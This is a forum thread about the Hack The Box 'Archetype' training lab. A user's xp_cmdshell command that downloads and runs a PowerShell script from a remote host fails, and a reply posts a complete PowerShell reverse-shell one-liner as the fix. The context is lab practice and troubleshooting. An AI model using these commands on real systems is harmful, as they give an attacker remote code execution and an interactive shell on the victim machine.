Hey,
Trying to do the archetype starting point challenge but I end up getting the following error whilst doing the command:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.12/shell.ps1\");"
Error:
IEX : At line:1 char:275
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks ("&") to pass it as part of a string.
Does anyone know a fix? Followed the instructions as in the PDF. I tried doing it with quotation marks around it but still end up with errors.
//Fixed
Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.
Cork
July 13, 2021, 9:30am
3
@Inspect said:
//Fixed
Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.
Do you mind posting an actual fix, because I see this as a technical problem, not a spoiler.
Yea, I bumped into it, and what @Inspect means is that the script in the PDF doesn't have spaces. I found a GitHub account that has the same one-liner for the PowerShell netcat script:
powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
happy hacking